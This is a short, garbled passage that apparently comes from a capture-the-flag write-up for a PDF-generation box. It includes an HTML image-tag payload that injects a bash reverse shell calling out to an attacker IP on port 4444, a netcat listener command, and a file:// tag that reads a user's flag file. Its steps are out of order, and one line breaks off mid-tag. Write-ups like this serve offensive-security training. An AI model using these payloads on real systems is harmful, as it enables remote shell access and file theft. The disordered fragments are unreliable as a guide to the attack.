<img src="http://127.0.0.1:8080/generate?html=<pre>$(bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1)</pre>"> Set up a listener:
Alternatively, get a root shell:
Common location:
<img src="file:///home/robert/user.txt"> Generate the PDF, and the flag appears. pdfy htb writeup upd
nc -lvnp 4444 Once connected, you’re www-data . Now, look for the flag. Step 8: Capturing the User Proof Data (UPD) The UPD for PDFY is typically located in the home directory of a low-privilege user. Let's enumerate. <img src="http://127
Check sudo rights: